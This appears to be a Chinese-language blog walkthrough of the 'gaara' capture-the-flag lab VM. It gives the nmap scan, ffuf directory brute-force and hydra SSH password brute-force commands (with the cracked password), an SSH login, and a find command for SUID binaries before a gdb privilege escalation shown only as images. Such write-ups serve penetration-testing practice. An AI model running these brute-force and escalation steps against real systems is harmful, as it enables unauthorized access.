首页 > 其他分享 >gaara

gaara

时间:2024-04-10 22:45:56浏览次数:9  
标签:gaara 192.168 11.93 得到 txt ssh

虚拟机配置

将靶机与kali攻击机放在同一网段如nat下即可

web渗透

扫描ip
nmap -sP 192.168.11.0/24
image
得到ip:192.168.11.93
详细扫描
nmap -A 192.168.11.93 -p 0-65535
image
有22和80端口
对http进行测试image
就是一张图片
扫描目录文件,这里要用大一点的字典
ffuf -u http://192.168.11.93/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ic -e .asp,.php,.html,.txt
image
扫到/Cryoserver
访问得到几个目录image
在/iamGaara下
发现一段编码
image
解码
image
还是没有得到garra用户ssh登录的密码
hydra爆破密码
hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.11.93 ssh
image
得到密码iloveyou2
登录ssh
ssh [email protected]
image
登录成功
image
得到flag

提权

find / -perm -u=s -type f 2>/dev/null
image
发现gdb有suid
image
image
提权成功
image
得到flag

标签:gaara,192.168,11.93,得到,txt,ssh
From: https://www.cnblogs.com/v3n0m-cccccc/p/18126538

相关文章